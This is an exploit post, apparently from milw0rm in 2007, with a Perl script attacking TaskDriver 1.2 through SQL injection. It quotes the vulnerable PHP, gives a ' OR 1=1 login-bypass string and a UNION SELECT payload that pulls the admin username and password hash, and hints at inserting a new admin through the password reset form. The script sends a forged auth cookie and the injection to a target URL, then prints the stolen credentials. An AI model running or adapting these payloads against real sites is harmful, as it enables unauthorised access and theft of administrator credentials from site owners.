TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit

[Ras]

#!/usr/bin/perl -w

#################################################################################
#                              #
#         TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit      #
#                              #
# Discovered by: Silentz                     #
# Payload: Login Bypass & Admin Username & Hash Retrieval         #
# Website: [url]http://www.No_Advertising.com[/url]                  #
#                               #
# Vulnerable Code (login.php):                      #
#                              #
# $sql = "SELECT * FROM  $userstable WHERE username = '$_POST[username]' AND    #
#         password = md5('$_POST[password]')";               #
#                              #
# Vulnerable Code (notes.php):                     #
#                                  #
# $taskid = $_GET['taskid'];                     #
# $sql = "SELECT * FROM $taskstable WHERE taskid = '$taskid'";         #
#                              #
# PoC: [url]http://victim.com/login.php[/url]                  #
#      In username box input: ' OR 1=1 /*               #
#      In password box: [ANYTHING OR NOTHING]               #
#                              #
#      OR:                            #
#                              #
#      http://victim.com/notes.php?taskid=-999' UNION SELECT 0,0,username,      #
#      0,0,0,0,0,0,0,0,0,password FROM users WHERE userlevel='a' /*      #
#                               #
# Subject To: magic_quotes_gpc set to off               #
# GoogleDork: Get your own!                     #
# Notes: You can do a UNION INSERT in the password reset form to add an admin   #
#                              #
# Shoutz: The entire No_Advertising community                  #
#                              #
#################################################################################

use LWP::UserAgent;
if (@ARGV < 1){
print "-------------------------------------------------------------------------\r\n";
print "           TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "Usage: No_Advertising.pl [PATH]\r\n\r\n";
print "[PATH] = Path where TaskDriver is located\r\n\r\n";
print "e.g. No_Advertising.pl http://victim.com/taskdriver/\r\n";
print "-------------------------------------------------------------------------\r\n";
print "                   http://www.No_Advertising.com\r\n";
print "                          ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
exit();
}

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$cookie = "fook%21%27+or+1%3D1+%2F%2A;";
$host = $ARGV[0] . "notes.php?taskid=-999' UNION SELECT 0,0,username,0,0,0,0,0,0,0,0,0,password FROM users WHERE userlevel='a' /*";

my @cookie = ('Cookie' => "auth=$cookie;");
my $res = $b->get($host, @cookie);

$answer = $res->content;
if ($answer =~ /notes on (.*?)<\/u><\/td><\/tr>/){
print "-------------------------------------------------------------------------\r\n";
print "            TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "[+] Admin User : $1\n";
}

if ($answer =~/([0-9a-fA-F]{32})<\/font>/){
print "[+] Admin Hash : $1\n";
print "-------------------------------------------------------------------------\r\n";
print "                   http://www.No_Advertising.com\r\n";
print "                          ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
}

# milw0rm.com [2007-05-10]